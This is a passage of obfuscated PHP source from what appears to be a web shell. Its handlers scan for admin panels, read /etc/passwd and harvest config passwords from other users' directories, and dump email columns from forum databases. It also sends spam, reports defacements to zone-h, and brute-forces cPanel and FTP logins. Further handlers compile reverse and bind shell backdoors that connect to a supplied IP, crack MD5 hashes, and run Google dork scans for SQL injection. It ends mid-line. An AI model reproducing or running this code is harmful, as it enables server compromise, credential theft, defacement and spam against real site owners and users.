if (isset($_POST["\x73\165b\155i\164_\154\157\154"])) { set_time_limit(0); $url = $_POST['hash_lol']; echo "\124\x65\163\164i\x6e\x67 ".$url."\n"; $extention = $_POST['extention']; $XLZ18gG1g = array( "admin/", "\167\x70-admin/", "\141\144\x6d\151\x6eis\164\162\141t\151\157n/", "\x61d\155\x69\156i\163\x74\162\x61\x74\x6f\162/", "\155\157d\145\162\x61\164\x6f\162/", "w\145\x62\x61\144mi\x6e/", "\141\x64\x6d\x69\x6ear\145\x61/", "b\x62-admin/", "\141d\x6din\x4c\157\147\151n/", "a\144\155\x69\x6e_\141\162\145a/", "\x70\x61\156\x65\x6c-\x61\x64m\151nis\164r\141\x63\x69\x6fn/", "\151\x6e\163\x74\141\x64\x6d\x69\x6e/", "\x6de\155\x62er\x61\144\x6di\156/", "a\x64m\151\x6e\x69\x73\x74\162a\x74\157\x72\x6c\157\147\x69n/", "\x61d\x6d/", "\x73i\x74\145\x61d\155\x69\x6e/l\x6f\x67i\156".$extention."", "admin/ac\143\x6f\165\x6e\164".$extention."", "admin/index".$extention."", "admin/logi\156".$extention."", "admin/admin".$extention."", "a\144\x6d\x69\156_ar\145a/\154o\x67\151\156".$extention."", "a\144m\151\x6e_a\x72ea/index".$extention."", "admincp/index".$extention."", "\141d\x6d\x69\x6e\160a\156\145l".$extention."", "\x77\145\142a\x64\x6d\x69\x6e".$extention."", "\x77e\x62a\144\x6di\156/index".$extention."", "\x77\x65\142a\144\155i\156/l\157\147\151n".$extention."", "admin/\141\144\155\151n_\154\157\147i\x6e".$extention."", "ad\x6d\x69\x6e_\154og\x69n".$extention."", "p\141\x6e\145\x6c-\141\144min\x69s\x74\162\141\x63\x69\x6f\x6e/lo\x67i\x6e".$extention."", "\141\144m\x69n_a\x72e\141/admin".$extention."", "b\142-admin/index".$extention."", "bb-admin/\x6cogi\156".$extention."", "b\x62-admin/admin".$extention."", "admin/\x68\157\155\145".$extention."", "\160ag\x65\x73/admin/admin-l\x6f\x67\x69\x6e".$extention."", "admin/admin-\x6c\157\147\x69n".$extention."", "admin-\x6cogi\x6e".$extention."", "admin/\141dm\151n\x4c\x6f\x67i\156".$extention."", "\150\x6fme".$extention."", "a\144m\x69n\x61\x72\x65\141/index".$extention."", "admin/\143\x6f\156t\162ol\x70\x61\156e\154".$extention."", "admin".$extention."", "admin/\143p".$extention."", "c\x70".$extention."", "\141d\155\151n\160a\x6e\145\x6c.p\x68p", "m\x6f\x64\145r\141\164\157r".$extention."", "\x61\x64\155i\156\x69\163t\162a\164\x6f\162/index".$extention."", "a\144mi\x6e\151s\164\162\141t\x6fr/\154o\147\151\156".$extention."", "user".$extention."", "\141\x64mi\x6e\151\163t\x72\x61t\157\x72/\141\143\x63o\165\156\x74".$extention."", "a\144m\x69n\x69\x73\164r\141\x74\157r".$extention."", "\154o\x67in".$extention."", "m\x6f\x64\145\154\163\145\x61r\143h/\x6c\x6fg\151n".$extention."", "\155\157\x64\x65\162a\164\x6fr/\x6c\157\147\151n".$extention."", "p\141n\x65\x6c-\x61\x64\x6din\151s\164\x72\x61\x63io\x6e/admin".$extention."", "\141\x64\155\x69nco\156\x74\x72o\154/\154\157\147\151n".$extention."", "\x61\144\x6d/index".$extention."", "\155\x6f\144\x65\162a\164\x6f\162/admin".$extention."", "\x61\x63\x63\157\x75\156\164".$extention."", "\143\157\x6e\164\162\x6f\x6c\x70\141\156\145l".$extention."", "\141\x64\155i\156con\x74rol".$extention."", "\x77e\142a\144\155in/admin".$extention."", "\x61d\x6din\x4co\x67\151n".$extention."", "\x70\x61\x6e\x65\154-admi\156\x69st\162\x61ci\x6f\x6e/l\x6f\147\151\x6e".$extention."", "\167\x70-l\x6f\147i\x6e".$extention."", "ad\x6di\x6e\x4c\157\x67\151\156".$extention."", "admin/\x61\x64m\151n\114\157gi\156".$extention."", "\x61\144\155\151na\162\145\141/index".$extention."", "\141d\x6din\141\162\x65a/admin".$extention."", "\x61\x64\155\x69n\x61re\141/lo\147in".$extention."", "\160\141\156\145l-admin\151\163tr\141\143\x69\x6f\156/index".$extention."", "\x6d\157d\145\154\163\145\x61rc\x68/index".$extention."", "mode\154\x73\145\141\162\143h/admin".$extention."", "\141\144\x6d/a\144\155\154\157g\151\156\165s\145r".$extention."", "\x61\144ml\x6f\147inuser".$extention."", "\x61\x64\155\x69\x6e2".$extention."", "\x61d\155\x69\156\062/l\157\147in".$extention."", "\141\144\155i\x6e2/index".$extention."", "\x61\x64m/index".$extention."", "\x61\144\x6d".$extention."", "aff\151\x6ci\141\x74\x65".$extention."", "\141\x64m_\141\165\x74h".$extention."", "me\x6db\x65\x72\141\x64\155in".$extention."", "\x61d\155\151\x6e\151\x73\164r\x61t\x6f\x72logi\156".$extention.""); foreach ($XLZ18gG1g as $admin) { $Dnc64gTRt = @get_headers("$url$admin"); if (@eregi('200', $Dnc64gTRt[0])) { echo "[+] $url$admin ~ \106o\x75n\x64!\n"; }
} }

else if($_POST['configFinderSubmit']) { set_time_limit(0); $passwd=fopen('/etc/passwd','r'); if (!$passwd) { echo "[-] \x45rr\157\x72 : c\x6fud\x6e'\164 read /\145\x74c/passwd"; exit; } $ZPVb1gklR=array(); $users=array(); $EAlb2g7dp=array(); $i=0; while(!feof($passwd)) { $Aahd7g2SB=fgets($passwd); if ($i>35) { $pos=strpos($Aahd7g2SB,”:”); $username=substr($Aahd7g2SB,0,$pos); $LKk3fgOpP=”/h\157\x6de/$username/p\165\x62\154i\143_\x68\164m\154/”; if (($username!=”")) { if (is_readable($LKk3fgOpP)) { array_push($users,$username); array_push($ZPVb1gklR,$LKk3fgOpP); } } } $i++; } echo “”; echo “[+] \x46ou\x6e\144\x65\x64 “.sizeof($users).” \x65\156\x74\162\171\163 \151n /et\x63/passwd
“; echo “[+] \x46o\165n\144ed “.sizeof($ZPVb1gklR).” r\x65\141\x64a\x62l\145 \160\165\142\x6ci\143_h\164ml \144\x69\x72ect\157\162\x69es
“; echo “[~] Se\141\162\143\150\x69\156\147 f\x6f\162 \160\141ss\167\157\162d\163 in config.* \146\151\x6c\x65\163…
“; foreach ($users as $user) { $path=”/ho\x6d\145/$user/\160\x75\x62\154\x69c_\x68\x74m\x6c/”; tArc8gPm6($path,$user); } echo “[+] \x44o\x6e\x65″; }

else if($_POST['sendMailStorm']) { $to=$_POST['to']; $nom=$_POST['nom']; $Comments=$_POST['Comments']; if ($to <> “” ) { for ($i = 0; $i < $nom ; $i++) { $from = rand (71,1020000000)."@"."\101\x74\x74\x61\143\x6be\x72.c\157m"; $subject= md5("$from"); if(@mail($to,$subject,$Comments,"From:$from")) echo "[+] $i \163p\141\x6dm\x65d !!
"; else { echo "[-] $i \106\141\151led !!
"; } } } }

else if($_POST['getEmails']) { $lVS47g9PD = $_POST['EM_HOST']; $YAG4agKT9 = $_POST['EM_USER']; $cEF48gFDY = $_POST['EM_PASS']; $KGF46grkr = $_POST['EM_DB']; $ble49g73K = $_POST['EM_TABLE']; $AjF45gcBM = $_POST['EM_COLUMN']; $foce3gc1h = @mysql_connect($lVS47g9PD,$YAG4agKT9,$cEF48gFDY); if(!$foce3gc1h) { echo "[-] \103\141\x6e'\x74 \103\x6fn\156e\x63\164 T\157 \x44B !! [ user name || password \151s wrong ! ] .
"; } $gYSe4gf4H = @mysql_select_db($KGF46grkr); if(!$gYSe4gf4H && $foce3gc1h) { echo "[-] \x44\102 \x4ea\155\x65 i\163 W\162\157\x6e\147 !! . "; } $sql = @mysql_query("SEL\x45CT * \x46\122\117\115 $ble49g73K"); while ($bDpcagAUg = @mysql_fetch_array($sql)) { echo ''.$bDpcagAUg["$AjF45gcBM"].'
'; } }

else if($_POST['emailExtractorHelp']) { echo "\x54\150\x69s i\x73 \123\157me \124\x61bl\145\x73 \116a\155\145 & \x43\x6f\154\165m\156s \x4e\141me \x46o\x72 \x53\x6fm\x65 F\x61\x6d Scrip\x74\163 ..

[+] \x56\102\165l\x6c\145t\151\x6e
Ta\142le-name : user
\143\157l\165m\156-name : email

[+] \127o\x72\144\x50\162\145\163s
T\141\142\x6c\x65-name : \167\160_\165se\x72\163
c\x6flumn-name : \165s\145r_\145\x6d\141il

[+] J\157\157\155\154a
\124\x61bl\145-name : \152\157\x73_\x75\x73\x65\162\163
\143\x6fl\x75\155\156-name : email

[+] \120\110PB\x42
\124\x61\x62\x6c\x65-name : ph\x70b\x62_\165s\x65rs
\x63\157lu\x6d\x6e-name : \165\x73\145r_\x65\155\141i\154

[+] I.\x50.B\157\x61\x72\x64
Tab\154e-name : \151\x62f_m\145\x6d\142\145rs
c\157lum\x6e-name : email

[+] S\115\x46
\x54\141b\x6c\145-name : \163\x6d\146_\155e\155b\145r\x73
c\x6fl\x75\155\156-name : \x65\x6d\141i\x6cA\x64\x64\x72es\x73 "; }

else if($_POST['MySQLQuery']) { $qu_host =$_POST['QU_HOST']; $qu_user =$_POST['QU_USER']; $qu_pass =$_POST['QU_PASS']; $qu_db =$_POST['QU_DB']; $query =$_POST['QU']; $query = str_replace('\\','',$query); echo $query; if (empty($_POST['QU_HOST'])) $qu_host = '127.0.0.1'; if (!empty($_POST['QU'])) { $NMEe6gOUS = @mysql_connect($qu_host,$qu_user,$qu_pass); if(!$NMEe6gOUS) { echo "[-] U\156\141\x62\154\145 \124\117 \103\157\x6e\156e\x63t \x44\x41TABA\x53E ! Username O\x72 P\x61s\x73w\157\162\144 \111\x73 W\162on\x67 !!"; } else { $eMMd0gMR4 = @mysql_select_db($qu_db); if(!$eMMd0gMR4) { echo "[-] \x44\x61tab\x61\163\x65 \116\x61\x6de \x49\x73 \x57\x72o\156g !!"; } else { $cGL9eg5UH = mysql_query($query); if($cGL9eg5UH) { update(); } else { echo "[-] \x43a\x6e'\x74 Ex\x65\x63u\164\x65 Th\x65 \121ue\162y"; } } } @mysql_close(); } }

else if ($_POST['sql2Read']) { $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $db = $_POST['db']; $rKAefgXn3 = uniqid('N'); $file = $_POST['file']; $file = str_replace('\\\\','\\',$file); $query = array( "\103R\105A\x54\105 \124\105M\120O\x52\x41\x52\x59 \x54ABLE $rKAefgXn3 (\x66\x69\154e \x4cO\116\x47\102L\117B)", "\114\117\x41\x44 \x44\x41\124\101 \111N\106I\x4c\x45 '".mysql_real_escape_string($file)."' \111\116T\117 T\x41BL\105 $rKAefgXn3", "S\105\x4cE\103\x54 * \x46R\x4f\x4d $rKAefgXn3" ); $connect = mysql_connect($host,$user, $pass); mysql_select_db($db,$connect); foreach($query as $agF2gTdKE) { $mysqlQuery = mysql_query($agF2gTdKE,$connect); while($line = @mysql_fetch_row($mysqlQuery)) echo htmlspecialchars($line[0]); echo "\n"; } }

else if($_POST['editFileSubmit']) { $currentPath = stripslashes($_POST['currentPath']); chdir($currentPath); $file2Edit = $_POST['editFile']; echo @file_get_contents($file2Edit); } else if($_POST['saveEditedFile']) { $currentPath = stripslashes($_POST['currentPath']); chdir($currentPath); $fileName = $_POST['file2edit']; $iKza4gt8P = $_POST['ExecutionArea']; $dIeecgGr5 = fYUag2UGE($fileName,$iKza4gt8P); if($dIeecgGr5) { echo "[+] \x46\x69\x6c\145 \x53av\145\144 !"; } else { echo "[-] F\141\151\x6c\x65\x64 \x54o Sav\x65 F\151l\145 !!"; } }

else if($_POST['SendNowToZoneH']) { ob_start(); $DcDdagDqo = @get_loaded_extensions(); if(!in_array("curl", $DcDdagDqo)) { die('[-] Curl Is Not Supported !! '); } $hacker = $_POST['defacer']; $method = $_POST['hackmode']; $sBpa3gfRp = $_POST['reason']; $site = $_POST['domain']; if (empty($hacker)) { die ("[-] \131o\165 M\165s\164 \x46\151l\x6c \x74h\x65 \x41tta\x63\x6b\x65r name !"); } elseif($method == "--------\123E\x4c\x45\x43\124--------") { die("[-] Y\x6f\x75 M\165s\164 \123\145\154\x65ct T\150\x65 Met\x68\157\144 !"); } elseif($sBpa3gfRp == "--------\123\x45\x4c\x45\103\124--------") { die("[-] \131ou \115\x75s\164 S\x65\154\x65\x63\x74 \124\150\145 \122ea\163\x6fn"); } elseif(empty($site)) { die("[-] Yo\x75 Mu\163\164 \111\156t\145\x72 t\x68\x65 \123\151\x74\145s \114\x69\x73\x74 ! "); } $i = 0; $sites = explode("\n", $site); while($i < count($sites)) { if(substr($sites[$i], 0, 4) != "h\x74t\160") { $sites[$i] = "\150t\x74\160://".$sites[$i]; } mEb17gi81("\x68\x74t\x70://\172\157\156e-\150.\x6f\162\x67/\x6eo\x74i\x66y/\163in\147\154\x65", $hacker, $method, $sBpa3gfRp, $sites[$i]); echo "S\x69\164\145 : ".$sites[$i]." \x44\x65\146\141\x63e\144 !\n"; ++$i; } echo "[+] S\145\x6e\x64\x69\x6e\x67 \123i\164es \x54o Z\x6fn\145-H Ha\163 \102\x65e\x6e \103o\155p\154\145\164\x65\144 \x53u\x63c\145\x73\x73\x66\x75\154l\171 !! "; }

else if($_POST['BruteForceCpanelAndFTP']) { $PpZ2bg1RL=5; set_time_limit(0); $submit=$_REQUEST['BruteForceCpanelAndFTP']; $users=$_REQUEST['users']; $pass=$_REQUEST['passwords']; $target=$_REQUEST['target']; $cracktype=$_REQUEST['cracktype']; if(empty($target)) { $target = "127.0.0.1"; } function qNR5bgPYM($host,$user,$pass,$timeout) { $oGq24gO8N = curl_init(); curl_setopt($oGq24gO8N, CURLOPT_URL, "ftp://$host"); curl_setopt($oGq24gO8N, CURLOPT_RETURNTRANSFER, 1); curl_setopt($oGq24gO8N, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($oGq24gO8N, CURLOPT_FTPLISTONLY, 1); curl_setopt($oGq24gO8N, CURLOPT_USERPWD, "$user:$pass"); curl_setopt ($oGq24gO8N, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($oGq24gO8N, CURLOPT_FAILONERROR, 1); $data = curl_exec($oGq24gO8N); if ( curl_errno($oGq24gO8N) == 28 ) { print "\105\x72\x72\x6f\x72 : \103\157n\156e\x63t\x69\x6fn \124i\x6d\x65ou\x74 \x50l\x65\x61s\x65 \103\x68ec\153 \x54he Tar\x67\145\164 H\x6fs\164\x6eam\x65 ."; exit; } elseif ( curl_errno($oGq24gO8N) == 0 ) { print "[+] \103\x72\141\143k\x69\156\147 S\165c\143\145s\163 \x57\x69\164h Username ($user) a\156\x64 \x50\141\163\163w\x6f\162\144 ($pass)"; } curl_close($oGq24gO8N); } function jFh2dgOCI($host,$user,$pass,$timeout) { $oGq24gO8N = curl_init(); curl_setopt($oGq24gO8N, CURLOPT_URL, "\x68\164\164p://$host:2082"); curl_setopt($oGq24gO8N, CURLOPT_RETURNTRANSFER, 1); curl_setopt($oGq24gO8N, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($oGq24gO8N, CURLOPT_USERPWD, "$user:$pass"); curl_setopt ($oGq24gO8N, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($oGq24gO8N, CURLOPT_FAILONERROR, 1); $data = curl_exec($oGq24gO8N); if ( curl_errno($oGq24gO8N) == 28 ) { print "[-] \103on\x6e\145\x63t\151on T\151m\x65ou\164 P\x6c\145\x61s\x65 \x43\x68\x65c\153 Th\x65 \124a\162\147\145t \110\x6f\x73\x74\x6e\141\x6de ."; exit; } elseif ( curl_errno($oGq24gO8N) == 0 ) { print "[+] C\x72\141c\x6b\x69\156\147 Su\143c\145s\163 \127i\164h Username ($user) a\x6ed P\141s\x73wo\x72\144 ($pass)"; } curl_close($oGq24gO8N); } if(isset($submit) && !empty($submit)) { if(empty($users) && empty($pass)) { print "[-] \x50\x6c\x65\x61\163\x65 \103\x68e\x63k \x54\x68e Users \157\x72 P\x61s\x73\x77\157r\144 \114\151\163\164 Entry . . ."; } if(empty($users)) { print "[-] P\x6c\x65\141se \103\150e\x63\x6b \124he Users Li\163\x74 Entry . . ."; } if(empty($pass)) { print "[-] \x50\154\145a\163\x65 C\150ec\x6b \124\150\145 \x50\x61\x73s\x77o\x72\144 \114\151st Entry . . "; } $Icpf3gfjT=explode("\n",$users); $KzOb0gq5c=explode("\n",$pass); print "[~]# \x43\162\x61\143k\x69\x6e\147 \x50\162o\x63\145\x73\x73 \123\164\141r\x74e\144, \120\x6ce\x61\x73\x65 Wait ..."; foreach ($Icpf3gfjT as $user) { $JDBc3gah3 = trim($user); foreach ($KzOb0gq5c as $password ) { $oMKc2g8U6 = trim($password); if($cracktype == "ftp") { qNR5bgPYM($target,$JDBc3gah3,$oMKc2g8U6,$PpZ2bg1RL); } if ($cracktype == "c\160a\156\x65\x6c") { jFh2dgOCI($target,$JDBc3gah3,$oMKc2g8U6,$PpZ2bg1RL); } } } } }

else if($_POST['backconn']) { if (!empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); FXdedgZi9("\142\143c.\x63",$eSn1fg4kZ); Exe('gcc -o bcc bcc.c'); Exe('chmod 777 bcc'); @unlink('bcc.c'); Exe("./\x62\x63\x63 ".$ip." ".$port." &"); $ite9agRj5 = "\116\x6fw s\143ri\160\x74 t\162\x79 connect to ".$ip." port ".$port." ..."; } elseif (!empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); FXdedgZi9("\142\143\160",$Eos1egq1Z); Exe("\143\150m\157\x64 +x \x62\x63\x70"); $rKqafg7hn=which("perl"); Exe($rKqafg7hn." \142\143\160 ".$ip." ".$port." &"); $ite9agRj5 = "No\167 \x73\x63\x72\151\160t t\162y connect to ".$ip." port ".$port." ..."; } }

else if($_POST['bind']) { if (!empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); FXdedgZi9("\x62dc.c",$HdobbgT8R); Exe('gcc -o bdc bdc.c'); Exe('chmod 777 bdc'); @unlink("b\x64\143.\143"); Exe("./\142\144\143 ".$port." ".$passwrd." &"); $scan = Exe("\x70\x73 aux"); if(eregi("./\142\x64c $VMhbagZo1",$scan)) { $ite9agRj5 = "Pr\x6f\143\x65\x73s f\157\165n\x64 \x72\165n\x6e\151\156g, \142a\143\153\x64\157\157\162 \163\145\x74\x75\x70 \x73\x75\143\143\145\163\163\146\x75ll\171."; } else { $ite9agRj5 = "\x50\x72\x6f\143\x65s\x73 \156o\164 f\x6f\165nd ru\x6e\156\x69\x6e\147, \x62a\x63\x6b\x64oo\x72 \x6eo\164 s\145\x74\x75p \x73\165cc\x65\x73\163\146\x75\x6c\154y."; } } elseif (!empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); FXdedgZi9("\x62\144\x70",$IzObcgPAM); Exe("\x63\150m\x6f\x64 777 b\x64\x70"); $rKqafg7hn=which("perl"); Exe($rKqafg7hn." \142\x64\160 ".$port." &"); $scan = Exe("ps a\x75\x78"); if(eregi("$rKqafg7hn \142d\x70 $port",$scan)) { $ite9agRj5 = "\x50\x72\x6fc\145s\x73 \x66o\165\156d \x72\165\x6e\x6ei\156g, \142\141\x63\153\x64\x6fo\x72 \163e\x74up su\143\x63es\163\x66\x75\x6c\x6c\171."; } else { $ite9agRj5 = "\x50ro\x63e\x73\163 \156o\x74 \146o\165\156\x64 \x72u\156\156i\156\147, b\x61\x63kd\x6f\157r \156o\x74 set\165p s\165cc\145\163s\x66\x75\x6c\x6cy."; } } }

elseif($_POST['CrackMd5']) { @set_time_limit(0); function kVf30gIUo() { set_time_limit(0); $chars=$_POST['chars']; $chars=str_replace("<",chr(60),$chars); $chars=str_replace(">“,chr(62),$chars); $c=strlen($chars); for ($next = 0; $next <= 31; $next++) { for ($GYM68gLJ7 = 0; $GYM68gLJ7 <= $c; $GYM68gLJ7++) { $sedfcgt2V[1] = $chars{$GYM68gLJ7}; for ($rng73gK_l = 0; $rng73gK_l <= $c; $rng73gK_l++) { $sedfcgt2V[2] = $chars{$rng73gK_l}; if ($next <= 2) { result(implode($sedfcgt2V)); }else { for ($gzd7egsda = 0; $gzd7egsda <= $c; $gzd7egsda++) { $sedfcgt2V[3] = $chars{$gzd7egsda}; if ($next <= 3) { result(implode($sedfcgt2V)); }else { for ($IEZ81g5PH = 0; $IEZ81g5PH <= $c; $IEZ81g5PH++) { $sedfcgt2V[4] = $chars{$IEZ81g5PH}; if ($next <= 4) { result(implode($sedfcgt2V)); }else { for ($ptM82gnXZ = 0; $ptM82gnXZ <= $c; $ptM82gnXZ++) { $sedfcgt2V[5] = $chars{$ptM82gnXZ}; if ($next <= 5) { result(implode($sedfcgt2V)); }else { for ($DbF83gRna = 0; $DbF83gRna <= $c; $DbF83gRna++) { $sedfcgt2V[6] = $chars{$DbF83gRna}; if ($next <= 6) { result(implode($sedfcgt2V)); }else { for ($ARF84grqS = 0; $ARF84grqS <= $c; $ARF84grqS++) { $sedfcgt2V[7] = $chars{$ARF84grqS}; if ($next <= 7) { result(implode($sedfcgt2V)); }else { for ($XFr85g7kn = 0; $XFr85g7kn <= $c; $XFr85g7kn++) { $sedfcgt2V[8] = $chars{$XFr85g7kn}; if ($next <= 8) { result(implode($sedfcgt2V)); }else { for ($YsJ86gY1r = 0; $YsJ86gY1r <= $c; $YsJ86gY1r++) { $sedfcgt2V[9] = $chars{$YsJ86gY1r}; if ($next <= 9) { result(implode($sedfcgt2V)); }else { for ($fMF69gtAT = 0; $fMF69gtAT <= $c; $fMF69gtAT++) { $sedfcgt2V[10] = $chars{$fMF69gtAT}; if ($next <= 10) { result(implode($sedfcgt2V)); }else { for ($NDf6ageDq = 0; $NDf6ageDq <= $c; $NDf6ageDq++) { $sedfcgt2V[11] = $chars{$NDf6ageDq}; if ($next <= 11) { result(implode($sedfcgt2V)); }else { for ($oNA6bgeZm = 0; $oNA6bgeZm <= $c; $oNA6bgeZm++) { $sedfcgt2V[12] = $chars{$oNA6bgeZm}; if ($next <= 12) { result(implode($sedfcgt2V)); }else { for ($VOK6cgToc = 0; $VOK6cgToc <= $c; $VOK6cgToc++) { $sedfcgt2V[13] = $chars{$VOK6cgToc}; if ($next <= 13) { result(implode($sedfcgt2V)); }else { for ($OPK6dge29 = 0; $OPK6dge29 <= $c; $OPK6dge29++) { $sedfcgt2V[14] = $chars{$OPK6dge29}; if ($next <= 14) { result(implode($sedfcgt2V)); }else { for ($oAl6egBoZ = 0; $oAl6egBoZ <= $c; $oAl6egBoZ++) { $sedfcgt2V[15] = $chars{$oAl6egBoZ}; if ($next <= 15) { result(implode($sedfcgt2V)); }else { for ($gac6fgEM3 = 0; $gac6fgEM3 <= $c; $gac6fgEM3++) { $sedfcgt2V[16] = $chars{$gac6fgEM3}; if ($next <= 16) { result(implode($sedfcgt2V)); }else { for ($eKo70gZbI = 0; $eKo70gZbI <= $c; $eKo70gZbI++) { $sedfcgt2V[17] = $chars{$eKo70gZbI}; if ($next <= 17) { result(implode($sedfcgt2V)); }else { for ($abT71gELR = 0; $abT71gELR <= $c; $abT71gELR++) { $sedfcgt2V[18] = $chars{$abT71gELR}; if ($next <= 18) { result(implode($sedfcgt2V)); }else { for ($CZN72gbhX = 0; $CZN72gbhX <= $c; $CZN72gbhX++) { $sedfcgt2V[19] = $chars{$CZN72gbhX};
if ($next <= 19) { result(implode($sedfcgt2V)); }else { for ($PgC74gP3t = 0; $PgC74gP3t <= $c; $PgC74gP3t++) { $sedfcgt2V[20] = $chars{$PgC74gP3t}; if ($next <= 20) { result(implode($sedfcgt2V)); }else { for ($cZU75g5cp = 0; $cZU75g5cp <= $c; $cZU75g5cp++) { $sedfcgt2V[21] = $chars{$cZU75g5cp}; if ($next <= 21) { result(implode($sedfcgt2V)); }else { for ($Bjh76gt8A = 0; $Bjh76gt8A <= $c; $Bjh76gt8A++) { $sedfcgt2V[22] = $chars{$Bjh76gt8A}; if ($next <= 22) { result(implode($sedfcgt2V)); }else { for ($HVc77gL7H = 0; $HVc77gL7H <= $c; $HVc77gL7H++) { $sedfcgt2V[23] = $chars{$HVc77gL7H}; if ($next <= 23) { result(implode($sedfcgt2V)); }else { for ($Ohc78gMzG = 0; $Ohc78gMzG <= $c; $Ohc78gMzG++) { $sedfcgt2V[24] = $chars{$Ohc78gMzG}; if ($next <= 24) { result(implode($sedfcgt2V)); }else { for ($SIU79gd1h = 0; $SIU79gd1h <= $c; $SIU79gd1h++) { $sedfcgt2V[25] = $chars{$SIU79gd1h}; if ($next <= 25) { result(implode($sedfcgt2V)); }else { for ($JBz7agfEE = 0; $JBz7agfEE <= $c; $JBz7agfEE++) { $sedfcgt2V[26] = $chars{$JBz7agfEE}; if ($next <= 26) { result(implode($sedfcgt2V)); }else { for ($PZd7bgsOp = 0; $PZd7bgsOp <= $c; $PZd7bgsOp++) { $sedfcgt2V[27] = $chars{$PZd7bgsOp}; if ($next <= 27) { result(implode($sedfcgt2V)); }else { for ($TAM7cg6C8 = 0; $TAM7cg6C8 <= $c; $TAM7cg6C8++) { $sedfcgt2V[28] = $chars{$TAM7cg6C8}; if ($next <= 28) { result(implode($sedfcgt2V)); }else { for ($Bma7dgoT7 = 0; $Bma7dgoT7 <= $c; $Bma7dgoT7++) { $sedfcgt2V[29] = $chars{$Bma7dgoT7}; if ($next <= 29) { result(implode($sedfcgt2V)); }else { for ($ziH7fgEX6 = 0; $ziH7fgEX6 <= $c; $ziH7fgEX6++) { $sedfcgt2V[30] = $chars{$ziH7fgEX6}; if ($next <= 30) { result(implode($sedfcgt2V)); }else { for ($ZbK80gPGm = 0; $ZbK80gPGm <= $c; $ZbK80gPGm++) { $sedfcgt2V[31] = $chars{$ZbK80gPGm}; if ($next <= 31) { result(implode($sedfcgt2V)); }}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}} function result($sedfcgt2V) { global $dat, $date; $hash = $_POST['pass']; $rFR34gbTR = date("H:i:s"); $lSl35gbT7 = date("d:\x6d:\x59"); if(md5($sedfcgt2V)==$hash) { echo "[+] C\162\x61\x63\x6b\x65d !!
P\x61s\163\167o\x72\x64 \x69\x73: $sedfcgt2V"; exit; } } if(!$_POST['pass']) { echo "\131\x6fu \106or\x67ot \123\157\x6de\x74\x68\151\x6eg \x49\155p\x6frta\156\164 !! .. \x4ci\x6be H\141\163h : ) ."; } else { $pass=htmlspecialchars($pass); $pass=stripslashes($pass); $dat=date("H:i:s"); $date=date("d:m:\x59"); kVf30gIUo(); } }

elseif($_POST['AutoHackNow']) { @chdir($_POST['autoHackDir']); if(file_exists('AutoHackConfig.txt')) { $cYFeagPXd = unlink('AutoHackConfig.txt'); if(!$cYFeagPXd) { if($afSadgZf6 == 'Windows') { Exe('del AutoHackConfig.txt'); } else { Exe('rm AutoHackConfig.txt'); } } } $domainToHack = $_POST['domainToHack']; $domainToHack = str_replace("h\x74t\x70://","",$domainToHack); $domainToHack = str_replace("\x77w\x77","",$domainToHack); $ScriptType = $_POST['ScriptType']; $XnP3g6CaJ = $_POST['index']; $scriptPath = $_POST['scriptPath']; $eDa42ghLl = PRT61gCts($domainToHack); $oqP2agXIo = VSn5fgzgV($ScriptType); if(function_exists('symlink')) { symlink("/h\157m\145/$eDa42ghLl/\x70\x75bl\x69\x63_\150\164m\x6c$scriptPath$oqP2agXIo",'AutoHackConfig.txt'); } else { Exe("\x6cn -s /\x68ome/$eDa42ghLl/\x70\165\x62\x6c\x69c_\x68t\155\154$scriptPath$oqP2agXIo \x41\165\164\x6f\x48a\x63\x6b\103on\x66ig.\x74xt"); } $file = file_get_contents('AutoHackConfig.txt'); fYUag2UGE('FileToInclude.txt',$file); chmod('FileToInclude.txt',0644); include_once('FileToInclude.txt'); fYZ4g87Nj(); }

elseif($_POST['StartScan']) { @set_time_limit(0); @error_reporting(0); @ignore_user_abort(true); ini_set('memory_limit', '128M'); $google = "h\164\164p://\x77\x77\x77.google.com/c\x73e?\x63\170=013269018370076798483%3A\x77\x64\x62a3\x64ln\x78qm&\x71=\x52\105PL\x41\x43E_D\x4fRK&\x6e\x75\155=100&\x68\x6c=e\156&\x61\163_q\144\162=\141l\154&start=\122\x45\120L\101\103\105_\123\x54\x41RT&\x73\141=\116"; $i = 0; $a = 0; $b = 0; while($b <= 900) { $a = 0; echo " \104\x6fr\x6b: [ ".$_POST['dork']."]\n"; ob_flush(); flush(); sleep(1); if(preg_match("/\x64\x69d \x6e\157\x74 \155\x61\164\143\150 an\x79 \144\x6fcu\155e\x6e\x74s/", ekV8gb3DG(str_replace(array("R\x45P\114\x41C\105_\104\x4fR\113", "R\105\120\114A\x43E_\x53\124\101\x52\124"), array("".$_POST['dork']."", "$b"), $google)), $mLGf5g22l)) { echo "\x53\145\x65 so\x6d\x65\164\150\151n\x67 \x62\165\x74 \156\157\164 \146ou\156\144??"; ob_flush(); flush(); sleep(1); break; } preg_match_all("/<\x682 cla\163s=(.*?)>/”, ekV8gb3DG(str_replace(array(“RE\120\114\x41CE_DO\122K”, “\122E\x50\x4cA\103\x45_S\124A\x52T”), array(“”.$_POST['dork'].”", “$b”), $google)), $sites); echo “\x52\x65\x73\165\x6c\164 o\146 inj\x65\x63\164\151\157\x6e…\n”; ob_flush(); flush(); sleep(1); while(1) { ob_flush(); flush(); sleep(1); if(preg_match(“/Y\157\x75 \150a\166e \x61n e\x72ror i\x6e \171\157ur \x53\121\x4c|\104\x69\166\151\x73\x69\x6fn \x62\x79 \172\x65ro in|\x73\165pp\154\151ed \141rg\x75\x6de\156t \x69\163 \x6e\x6f\x74 a v\x61\x6c\x69\144 \115yS\121\x4c result \162\x65\163o\x75\162c\x65 \151\156|Ca\x6c\154 to a 